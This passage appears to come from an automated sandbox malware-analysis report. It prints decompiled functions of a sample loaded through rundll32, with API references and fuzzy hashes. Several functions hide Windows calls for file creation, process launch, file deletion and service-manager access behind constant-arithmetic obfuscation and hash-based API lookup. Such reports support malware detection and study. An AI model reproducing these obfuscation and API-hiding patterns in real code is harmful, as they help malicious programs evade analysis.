									E10003C80(_t66, _t70[1] + _a4,  *_t70);
									 *((intOrPtr*)(_t70 - 8)) = _t66;
									goto L9;
								}
							}
						} else {
							_t67 =  *(_a12 + 0x38);
							if(_t67 <= 0) {
								goto L10;
							} else {
								if(VirtualAlloc( *((intOrPtr*)(_t70 - 4)) + _t44, _t67, 0x1000, 4) == 0) {
									L12:
									return 0;
								} else {
									 *((intOrPtr*)(_t70 - 8)) =  *((intOrPtr*)(_t70 - 4)) + _t44;
									E10003C50( *((intOrPtr*)(_t70 - 4)) + _t44, 0, _t67);
									L9:
									_t76 = _t76 + 0xc;
									goto L10;
								}
							}
						}
						goto L13;
						L10:
						_t38 = _v8 + 1;
						_t70 =  &(_t70[0xa]);
						_v8 = _t38;
					} while (_t38 < ( *( *_a16 + 6) & 0x0000ffff));
					goto L11;
				}
				L13:
			}

0x10003da0
0x10003da3
0x10003da8
0x10003dab
0x10003dad
0x10003dba
0x10003dbe
0x10003dca
0x10003e84
0x10003e90
0x10003dd0
0x10003dd6
0x10003de0
0x10003de0
0x10003de4
0x10003e32
0x00000000
0x10003e34
0x10003e44
0x10003e48
0x00000000
0x10003e4a
0x10003e57
0x10003e5b
0x10003e60
0x00000000
0x10003e60
0x10003e48
0x10003de6
0x10003dea
0x10003def
0x00000000
0x10003df1
0x10003e03
0x10003e93
0x10003e9c
0x10003e09
0x10003e12
0x10003e15
0x10003e63
0x10003e63
0x00000000
0x10003e63
0x10003e03
0x10003def
0x00000000
0x10003e66
0x10003e74
0x10003e75
0x10003e7a
0x10003e7a
0x00000000
0x10003de0
0x00000000

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 10003DFF

Part of subcall function 10003C50: _memset.LIBCMT ref: 10003C64

VirtualAlloc.KERNELBASE(?,?,00001000,00000004,?,?), ref: 10003E44

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: AllocVirtual$_memset
String ID:
API String ID: 1876456587-0
Opcode ID: f7401d659560031d9c17cb10a26f9ff5ef52e57436c2b187bbb76e7774026977
Instruction ID: f15a86c0704b51378d86cbb5121b1bdfad3b0682261688cfccde8590deb210b6
Opcode Fuzzy Hash: f7401d659560031d9c17cb10a26f9ff5ef52e57436c2b187bbb76e7774026977
Instruction Fuzzy Hash: 04319A796042419BE321CF08DC81F6BB3E9EF88794F15892DE9858B384D774EC49CB61

Uniqueness

Uniqueness Score: -1.00%

Function 002A8409, Relevance: 1.6, APIs: 1, Instructions: 80
fileCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E002A8409(void* __ecx, long __edx, intOrPtr _a4, long _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a40, long _a44, intOrPtr _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t57;
				void* _t72;
				signed int _t74;
				signed int _t75;
				signed int _t76;
				long _t86;

				_push(_a48);
				_t86 = __edx;
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E0029E171(_t57);
				_v28 = 0x3438bc;
				_v24 = 0;
				_v12 = 0xcb52;
				_t74 = 0xd;
				_v12 = _v12 * 0x44;
				_v12 = _v12 * 0x51;
				_v12 = _v12 ^ 0x1116e99e;
				_v20 = 0x8d1c;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x00234fd5;
				_v8 = 0x5991;
				_t75 = 0x12;
				_v8 = _v8 / _t74;
				_v8 = _v8 / _t75;
				_v8 = _v8 ^ 0x00000693;
				_v16 = 0xdaea;
				_t76 = 0x6e;
				_v16 = _v16 / _t76;
				_v16 = _v16 ^ 0x00006144;
				E0029606F(0x128, 0xb6b01ae5, _t76, _t76, 0xd3c406ee);
				_t72 = CreateFileW(_a40, _a44, _a32, 0, _a8, _t86, 0); // executed
				return _t72;
			}

0x002a8411
0x002a8416
0x002a8418
0x002a841b
0x002a841e
0x002a841f
0x002a8422
0x002a8425
0x002a8428
0x002a842b
0x002a842c
0x002a842f
0x002a8432
0x002a8435
0x002a8437
0x002a843c
0x002a8445
0x002a8448
0x002a8455
0x002a8458
0x002a845f
0x002a8462
0x002a8469
0x002a8470
0x002a8474
0x002a847b
0x002a8487
0x002a8488
0x002a8494
0x002a8499
0x002a84a0
0x002a84aa
0x002a84b5
0x002a84b8
0x002a84d7
0x002a84ee
0x002a84f5

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00006144,?,00000000), ref: 002A84EE

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction ID: d2295b630d8ad6c3ba11ae168f8ef1a109003ccf80ad3773a040f3dda1baba22
Opcode Fuzzy Hash: d4659c096c709fa19e878a53af5a36d243dcc7bf27e5cf64b735575a0ea006bd
Instruction Fuzzy Hash: 90310672901208FBDF05DF95CD498DEBFB6FF88304F108199F914A6250D7B69A20DB90

Uniqueness

Uniqueness Score: -1.00%

Function 002A8165, Relevance: 1.6, APIs: 1, Instructions: 78
processCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E002A8165(WCHAR* __ecx, WCHAR* __edx, intOrPtr _a4, struct _STARTUPINFOW* _a8, int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a36, struct _PROCESS_INFORMATION* _a44, intOrPtr _a48, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _t47;
				int _t58;
				signed int _t61;
				void* _t65;
				WCHAR* _t66;
				WCHAR* _t67;

				_push(_a56);
				_t67 = __edx;
				_push(0);
				_push(_a48);
				_t66 = __ecx;
				_push(_a44);
				_push(0);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0029E171(_t47);
				_v16 = 0xa2fc;
				_v16 = _v16 >> 5;
				_v16 = _v16 + 0xffff1f57;
				_v16 = _v16 ^ 0xffff035a;
				_v12 = 0x8842;
				_t61 = 0xc;
				_v12 = _v12 * 0xd;
				_push(0xd8c5ba15);
				_v12 = _v12 / _t61;
				_v12 = _v12 ^ 0x0000f812;
				_v20 = 0x5415;
				_push(_t61);
				_push(_t61);
				_push(0xb6b01ae5);
				_v20 = _v20 * 0x5b;
				_v20 = _v20 ^ 0x001da8a2;
				_v8 = 0xf8b5;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x80bbebc5;
				_v8 = _v8 ^ 0x80bbcffb;
				_t65 = 0x47;
				E0029606F(_t65);
				_t58 = CreateProcessW(_t66, _t67, 0, 0, _a20, 0, 0, 0, _a8, _a44); // executed
				return _t58;
			}

0x002a816e
0x002a8173
0x002a8175
0x002a8176
0x002a8179
0x002a817b
0x002a817e
0x002a817f
0x002a8182
0x002a8183
0x002a8186
0x002a8189
0x002a818c
0x002a818d
0x002a818e
0x002a8191
0x002a8194
0x002a8195
0x002a8196
0x002a819b
0x002a81a4
0x002a81a8
0x002a81af
0x002a81b6
0x002a81c3
0x002a81c7
0x002a81cf
0x002a81d4
0x002a81d7
0x002a81de
0x002a81e9
0x002a81ea
0x002a81eb
0x002a81f2
0x002a81f5
0x002a81fc
0x002a8203
0x002a8207
0x002a820e
0x002a8221
0x002a8222
0x002a823a
0x002a8242

APIs

CreateProcessW.KERNEL32(0BF52F2F,00000000,00000000,00000000,00000044,00000000,00000000,00000000,FFFF035A,?), ref: 002A823A

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction ID: 49656933ac85288f0cf17ba411d37ad31c82ed369e7056365a22f710f862aa52
Opcode Fuzzy Hash: b05528a14ea75ef9fb60441011f302ef31ff4d999b6e7fcdadd2a509598f610b
Instruction Fuzzy Hash: 3221E3B290020DBFEF05CE94CC86CEEBFB9FB44358F008198F91466260D3759A519B50

Uniqueness

Uniqueness Score: -1.00%

Function 002994A3, Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E002994A3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t40;
				intOrPtr* _t50;
				void* _t51;
				signed int _t53;
				void* _t58;
				void* _t59;

				_t59 = __edx;
				_t58 = __ecx;
				E0029E171(_t40);
				_v20 = 0xa96c;
				_v20 = _v20 ^ 0xdb4b0424;
				_v20 = _v20 ^ 0xdb4b8f37;
				_v8 = 0xec5f;
				_t53 = 0x33;
				_v8 = _v8 * 0x67;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 | 0x13f5ff17;
				_v8 = _v8 ^ 0x13f5eace;
				_v16 = 0x37e2;
				_v16 = _v16 * 0x6f;
				_v16 = _v16 ^ 0x001836ab;
				_v12 = 0x82bd;
				_v12 = _v12 >> 4;
				_t32 = _t53 + 0x5f; // 0x92
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00002d3b;
				_t50 = E0029606F(_t32, 0xb6b01ae5, _t53, _t53, 0x2e5d2a1c);
				_t51 =  *_t50(_t58, 0, _t59, 0x28, __ecx, __edx, _a4, 0, 0x28, _a16, _a20, _a24); // executed
				return _t51;
			}

0x002994ae
0x002994b0
0x002994c1
0x002994c6
0x002994cf
0x002994d6
0x002994dd
0x002994ea
0x002994ee
0x002994f1
0x002994f5
0x002994fc
0x00299503
0x0029951a
0x0029951d
0x00299524
0x0029952b
0x00299534
0x00299537
0x0029953a
0x0029954d
0x0029955b
0x00299562

APIs

SetFileInformationByHandle.KERNELBASE(6EE5A95E,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0029955B

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction ID: d41b51e5716b3b494d98c083858549d31fb7b61965af3ae4cc7cdc6f197a141a
Opcode Fuzzy Hash: baafaaa223f7f5a2fc0b958a68d71a7890cb0828c43d606bc6318d468937fe4b
Instruction Fuzzy Hash: 95214475E01208BBEB18DFA5C94AADEBFB5EB40304F108099F814AB291D3B55B159F90

Uniqueness

Uniqueness Score: -1.00%

Function 00298289, Relevance: 1.6, APIs: 1, Instructions: 52
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00298289(void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _v32;
				intOrPtr _v36;
				void* _t39;
				int _t49;
				signed int _t51;

				_push(_a4);
				E0029E171(_t39);
				_v36 = 0x41b5b5;
				asm("stosd");
				_t51 = 0x3d;
				asm("stosd");
				asm("stosd");
				_v12 = 0x9aa2;
				_v12 = _v12 + 0x23f6;
				_v12 = _v12 >> 0xc;
				_v12 = _v12 ^ 0x00001b6c;
				_v20 = 0x293c;
				_v20 = _v20 + 0xffff17af;
				_v20 = _v20 ^ 0xffff269b;
				_v16 = 0x3622;
				_v16 = _v16 | 0x78a52f71;
				_v16 = _v16 ^ 0x78a543e8;
				_v8 = 0x2f22;
				_v8 = _v8 + 0x35c7;
				_v8 = _v8 >> 2;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0000117e;
				E0029606F(0x314, 0xb6b01ae5, _t51, _t51, 0x1b106d81);
				_t49 = DeleteFileW(_a4); // executed
				return _t49;
			}

0x00298290
0x00298295
0x0029829a
0x002982a8
0x002982ab
0x002982af
0x002982b5
0x002982b6
0x002982bd
0x002982c4
0x002982c8
0x002982cf
0x002982d6
0x002982dd
0x002982e4
0x002982eb
0x002982f2
0x002982f9
0x00298300
0x00298307
0x00298311
0x00298319
0x00298332
0x0029833d
0x00298343

APIs

DeleteFileW.KERNELBASE(00001B6C,?,?,?,?,?,?,00000000), ref: 0029833D

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction ID: 1d656ddc82c03c92c784d1a30a7a6080e7328b9900ae62db7e028a19cb529e39
Opcode Fuzzy Hash: 068c8ad58f972a258c528a11afa709a8a7f7370e1a23e16540f0ab729b5d3cce
Instruction Fuzzy Hash: EE115B75E0120CFBEB08DFE9C84A4DEBBB5FB54304F108188E410A6264D3B94B198F50

Uniqueness

Uniqueness Score: -1.00%

Function 00293296, Relevance: 1.6, APIs: 1, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00293296(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				unsigned int _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t40;
				int _t49;
				signed int _t51;
				struct _SHFILEOPSTRUCTW* _t56;

				_push(_a4);
				_t56 = __ecx;
				_push(__ecx);
				E0029E171(_t40);
				_v28 = _v28 & 0x00000000;
				_v24 = _v24 & 0x00000000;
				_v36 = 0x1409b1;
				_v32 = 0x71de97;
				_v20 = 0x10af;
				_v20 = _v20 << 3;
				_v20 = _v20 ^ 0x000096e0;
				_v12 = 0xfce5;
				_v12 = _v12 ^ 0x58bbe0cf;
				_v12 = _v12 >> 5;
				_v12 = _v12 ^ 0x02c5a2c7;
				_v16 = 0xf79b;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x00000fb9;
				_v8 = 0xa9b8;
				_v8 = _v8 ^ 0x8b980f22;
				_t51 = 0xc;
				_v8 = _v8 / _t51;
				_v8 = _v8 ^ 0x0ba20c7c;
				E0029606F(0x21a, 0xf44a99f2, _t51, _t51, 0x438313f0);
				_t49 = SHFileOperationW(_t56); // executed
				return _t49;
			}

0x0029329d
0x002932a0
0x002932a3
0x002932a4
0x002932a9
0x002932af
0x002932b3
0x002932ba
0x002932c1
0x002932c8
0x002932cc
0x002932d3
0x002932da
0x002932e1
0x002932e5
0x002932ec
0x002932f3
0x002932f7
0x002932fe
0x00293305
0x00293311
0x0029331c
0x0029331f
0x0029333e
0x00293347
0x0029334d

APIs

SHFileOperationW.SHELL32 ref: 00293347

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction ID: 65e7d7f424304f6fd6c3cfef18f31eb562356a3e2356665c35fcae8288326e13
Opcode Fuzzy Hash: 4e58339be104edb10afeac2e85769c6a1b22744e76ddd0819eceb4ac5dedda93
Instruction Fuzzy Hash: D5111671D10219EBEF14DFE4C94AAEEBBB4EB44308F108199E414A7251C3B91B488F91

Uniqueness

Uniqueness Score: -1.00%

Function 002A9EEB, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E002A9EEB(void* __ecx, void* __edx, int _a4, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				short* _v24;
				short* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _t33;
				void* _t41;

				_push(_a16);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				E0029E171(_t33);
				_v36 = 0x1a5225;
				_v32 = 0x6186e9;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0x159f;
				_v20 = _v20 ^ 0xd8eb5afd;
				_v20 = _v20 ^ 0xd8eb17ca;
				_v16 = 0xd686;
				_v16 = _v16 * 0x29;
				_v16 = _v16 ^ 0x00226c98;
				_v12 = 0xd637;
				_v12 = _v12 | 0x41a2b1c9;
				_v12 = _v12 ^ 0x41a2fe45;
				_v8 = 0x7ffa;
				_v8 = _v8 | 0xd8d6b90f;
				_v8 = _v8 ^ 0xd8d6edd8;
				E0029606F(0x1ec, 0xbee648b, __ecx, __ecx, 0x6c130eb5);
				_t41 = OpenSCManagerW(0, 0, _a4); // executed
				return _t41;
			}

0x002a9ef2
0x002a9ef7
0x002a9efa
0x002a9efb
0x002a9eff
0x002a9f00
0x002a9f05
0x002a9f0f
0x002a9f1b
0x002a9f1e
0x002a9f21
0x002a9f28
0x002a9f2f
0x002a9f36
0x002a9f4d
0x002a9f50
0x002a9f57
0x002a9f5e
0x002a9f65
0x002a9f6c
0x002a9f73
0x002a9f7a
0x002a9f8d
0x002a9f9a
0x002a9fa0

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,41A2FE45,?,?,?,?,?,?,?,?,002A5A72,0000B2BF), ref: 002A9F9A

Memory Dump Source

Source File: 00000007.00000002.2094802545.0000000000291000.00000020.00000001.sdmp, Offset: 00290000, based on PE: true

Associated: 00000007.00000002.2094797808.0000000000290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2094817635.00000000002AF000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_290000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction ID: 6df8673da6bf8c52d38cce6acdcb58e09dba8e08d3be38e3532ca53a627cc314
Opcode Fuzzy Hash: 53ec5c0606a994eb95c08fd96e75b2b2180dfb57eb41605714a3daa805ae5c75
Instruction Fuzzy Hash: 5411F0B5D0122DABDB04DFE9C84A9EEBFB4EF05344F108189E815A6250D3B55B608FA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000D836, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000D836(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x1001ce88 = _t6;
				if(_t6 != 0) {
					 *0x1001d108 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x1000d84b
0x1000d851
0x1000d858
0x1000d85f
0x1000d865
0x1000d85b
0x1000d85b
0x1000d85b

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1000785F,00000001,?,?,?,100079D8,?,?,?,10019940,0000000C,10007A93), ref: 1000D84B

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: a2bdeed972c5e1c5f517a64abc5465eb55c00f1a8d4d43bcbaff984d54f8b068
Instruction ID: 03d0f2397262ed1fe27788895d3706a8c089eef43b13c19597db4270e2fe0340
Opcode Fuzzy Hash: a2bdeed972c5e1c5f517a64abc5465eb55c00f1a8d4d43bcbaff984d54f8b068
Instruction Fuzzy Hash: 43D05E32594359AAFB00BF706C88B263BDCD384395F14C436F80CC6150E574C980D600

Uniqueness

Uniqueness Score: -1.00%

Function 1000B863, Relevance: 1.5, APIs: 1, Instructions: 6
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E1000B863() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E1000B721(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x1000b863
0x1000b865
0x1000b867
0x1000b869
0x1000b871

APIs

_doexit.LIBCMT ref: 1000B869

Part of subcall function 1000B721: __lock.LIBCMT ref: 1000B72F
Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B766
Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B77B
Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B7A5
Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B7BB
Part of subcall function 1000B721: __decode_pointer.LIBCMT ref: 1000B7C8
Part of subcall function 1000B721: __initterm.LIBCMT ref: 1000B7F7
Part of subcall function 1000B721: __initterm.LIBCMT ref: 1000B807

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
Instruction ID: 3ecf49368b379c7b2fc98199b5acc746d8241b5fc8f67adb79b354a7e716a565
Opcode Fuzzy Hash: 71f5aa3ab10afe7edc69d9e50ae3ebcb4a9bdbb1c92fe6d79654d1a4b596b58f
Instruction Fuzzy Hash: D4A00269BD870031F860A6916C43F642101A790F81FE40050BB0C3C5C5B4C622584057

Uniqueness

Uniqueness Score: -1.00%

Function 10015810, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10015810() {
				long _t1;
				int _t2;

				_t1 =  *0x1001c474; // 0x1a
				_t2 = TlsFree(_t1); // executed
				return _t2;
			}

0x10015810
0x10015816
0x1001581c

APIs

TlsFree.KERNELBASE(0000001A), ref: 10015816

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: 8af25c7c9b994903295641f1181be720e98d9af565be09896da97764abd66e2c
Instruction ID: 3189aecceed89d167b2534510636476a67b303c0b63fd90fdf3e22a2a6a53b31
Opcode Fuzzy Hash: 8af25c7c9b994903295641f1181be720e98d9af565be09896da97764abd66e2c
Instruction Fuzzy Hash: C6A001719046249BEE019BA58E9C8263668A6492427009540E141C2221C636D4008A20

Uniqueness

Uniqueness Score: -1.00%

Function 1000C18E, Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1000C18E() {
				void* _t1;

				_t1 = E1000C11C(0); // executed
				return _t1;
			}

0x1000c190
0x1000c196

APIs

__encode_pointer.LIBCMT ref: 1000C190

Part of subcall function 1000C11C: TlsGetValue.KERNEL32 ref: 1000C12E
Part of subcall function 1000C11C: TlsGetValue.KERNEL32 ref: 1000C145
Part of subcall function 1000C11C: RtlEncodePointer.NTDLL(00000000,?,1000C195,00000000,10013C0B,1001C828,00000000,00000314,?,1000C0A7,1001C828,Microsoft Visual C++ Runtime Library,00012010), ref: 1000C183

Memory Dump Source

Source File: 00000007.00000002.2098500107.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2098491245.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098516590.0000000010016000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2098526866.000000001001B000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2098532453.000000001001F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: 12430fc690a5cffd0a560911a9b8f9666f7ca482c5d37c04a4b642a89194bcd7
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 100109FC, Relevance: 66.4, APIs: 44, Instructions: 432
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E100109FC(signed int __eax, void* __esi) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _t142;
				signed int _t145;
				signed int _t148;
				signed int _t151;
				signed int _t154;
				signed int _t157;
				signed int _t159;
				signed int _t162;
				signed int _t165;
				signed int _t168;
				signed int _t171;
				signed int _t174;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E1000C727(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E1000C727(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E1000C727(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E1000C727(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E1000C727(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E1000C727(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E1000C727(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E1000C727(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E1000C727(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E1000C727(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
